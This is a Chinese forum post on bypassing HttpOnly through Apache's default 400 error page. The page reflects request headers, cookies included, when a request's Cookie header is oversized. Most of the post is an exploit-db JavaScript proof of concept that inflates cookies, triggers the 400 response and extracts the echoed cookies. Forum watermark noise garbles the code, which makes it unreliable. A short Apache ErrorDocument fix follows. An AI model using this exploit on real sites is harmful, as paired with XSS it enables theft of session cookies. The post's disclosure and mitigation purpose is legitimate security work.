很多程序以及一些商业或成熟开源的CMS文章系统,为了防止XSS盗取用户cookie,一般都会给cookie加上HttpOnly属性,禁止直接用JS读取用户的cookie,从而降低XSS的危害;而这个问题刚好可以用来绕过cookie的HttpOnly属性。
用Chrome打开一个站点,按F12打开开发者工具,找到Console,输入如下代码并回车:
5 F( D* P' r6 j \0 C, S' t/ b
- a. l+ q" e9 J
// http://www.exploit-db.com/exploits/18442/
//
// Reviewer note (defender's reading of this listing):
// The snippet below demonstrates a server-side information disclosure, not a
// weakness in HttpOnly itself. setCookies() pads the browser's cookie jar with
// 10 cookies of 819 bytes each so that the next request's Cookie header exceeds
// the server's limit; the server answers 400 and, as pasted below, its default
// error page echoes the offending request headers inside <pre>…</pre> — cookies
// flagged HttpOnly included. parseCookies() only reacts to that 400 response.
//
// Mitigation (see the post that follows the listing): serve a custom message
// for status 400 (Apache: ErrorDocument 400 with a quoted string) so the error
// page no longer reflects request headers, and upgrade Apache to a release that
// fixes this — the Apache 2.2 vulnerabilities page is linked at the end of the
// post. Detection hint: bursts of 400 responses to requests carrying unusually
// large Cookie headers from one client are the observable signature of this
// technique.
//
// As pasted, the listing is interleaved with the forum's copy-protection
// watermark text and is not runnable in this form; it is kept verbatim here.
4 F' A. }4 j1 l# B# {0 Mfunction setCookies (good) {
$ y) R& I8 ?4 ~8 t5 n, Y* r6 v// Construct string for cookie value* R- o X$ P4 `% L
var str = "";- | B, M( M; |6 G) W2 }
for (var i=0; i< 819; i++) {
) m& l! a8 M; a% v8 D# h7 P0 ^# g2 Mstr += "x";! n! W' B* Q t" _
}
/ E+ E' ~$ z2 h/ m// Set cookies
( |7 d1 x0 C# S9 ?" g# u% {$ Qfor (i = 0; i < 10; i++) {
$ ]) A+ d" w* G// Expire evil cookie' G# l: D7 [6 x
if (good) {" f- n( R& q) F. A8 _
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";, b& c% N" q* b2 v3 k4 ^2 V7 U5 S8 A
}1 X& u# q/ ^$ S8 {2 q; k
// Set evil cookie
1 b( X% r, p* m! F( f8 belse {
: E+ R" M6 t, uvar cookie = "xss"+i+"="+str+";path=/";
* h1 ~4 T e+ d5 Q3 A1 p}# S- A" p( i8 d8 o. B
document.cookie = cookie;" h- a* g z* z8 T
}* O8 V3 D) g$ ?& |/ u& V8 Y
}" G" k* x" ]6 h9 s5 [: F
// Issues a same-origin GET to "/" after the oversized cookies are set; the
// interesting part for a defender is the 400 handler below, which is where the
// server's error page hands back the request headers.
function makeRequest() {
6 f9 V: B# `% k% usetCookies();5 ~7 ~$ A" V) L v6 a
// Reads the echoed Cookie header out of the 400 error page; a custom
// ErrorDocument for 400 (see the fix section below the listing) removes the
// <pre> echo this depends on.
function parseCookies () {
/ Q- M$ ^7 n: V# j6 ~/ K, t. Uvar cookie_dict = {};2 v/ [9 y. m7 b' r* [ Y
// Only react on 400 status
9 |$ G. I2 T7 g' J, W/ F+ M! ~- Qif (xhr.readyState === 4 && xhr.status === 400) {7 C9 k L/ `. T" `6 t& p$ |
// Replace newlines and match <pre> content
. R( N& T7 ]+ ]4 T7 m6 e& T3 k' gvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
" Z* e" A$ d8 y/ v) Gif (content.length) {
& X# ~: d# a1 e# t// Remove Cookie: prefix
7 [$ _. ]5 x2 U/ p* Z7 y5 hcontent = content[1].replace("Cookie: ", "");( ]8 c) o3 A8 S: c+ o9 E
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);2 o- J. w) L% s& z! L# N
// Add cookies to object
z% f% {$ U. C3 Kfor (var i=0; i<cookies.length; i++) {
: m+ z( @* X* U, {/ Cvar s_c = cookies.split('=',2);3 l) V7 F/ n/ L7 n
cookie_dict[s_c[0]] = s_c[1];* A+ r- d! }2 v2 a7 |- g4 X
}
1 u( |0 ^) s/ H3 H+ h& L4 z7 Z}
. m$ `3 G; |6 N; F" X// Unset malicious cookies
( C4 d8 ~. S" `6 L3 `$ esetCookies(true);/ j" c$ a3 p: ?; L( O
alert(JSON.stringify(cookie_dict));
e' w: a* D; Z}( G9 D6 Q. i# [+ y" r! |" [
}
" w: R. z" M$ b* [' I' V& v+ H// Make XHR request
) D# A, {; j5 z. l. g; dvar xhr = new XMLHttpRequest();
& I1 \7 J) U" y3 b: O. v, Pxhr.onreadystatechange = parseCookies;
2 K" i) ^. x; y9 g. Qxhr.open("GET", "/", true);1 t8 ?; M# H M6 _
xhr.send(null);" L1 B0 @0 [4 W3 x3 L- ?" n
}, ?) d9 U6 F" y) D
makeRequest();4 r2 k, O+ _6 {- [8 k7 v- e& I
你就能看见华丽丽的400错误页面中包含着cookie信息。
( c* g/ `6 B& ^1 z7 i* a
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
" u+ J- j' h$ ^
修复方案:
\& ]2 [1 U: }& I- y) V
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:
' o. a5 ?/ e# q, p- q( X3 |- ?5 g. Q& F5 Z+ G& h9 K6 E) k
In the event of a problem or error, Apache can be configured to do one of four things:
5 k# I. g. m; r3 p. ?6 F# p
1. output a simple hardcoded error message 输出一个简单生硬的错误信息
2. output a customized message 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部URL
4 L$ e W) R& b; E& @5 V0 @2 @5 `( {- N& E, S* u: ]
经测试,对于400错误只有方法2有效:配置后返回包不会再包含cookie内容。
2 f1 [: q7 j: N# n
Apache配置:
, N8 b M2 J0 f+ v' r
ErrorDocument 400 "security test"
. M1 @* L! P, ~% O4 i
当然,升级Apache到最新版本也可以:)。
0 w" ^) _+ k; d1 c- A& H
参考:http://httpd.apache.org/security/vulnerabilities_22.html
|1 b! H0 X n, e# W, Q$ r* [% o
|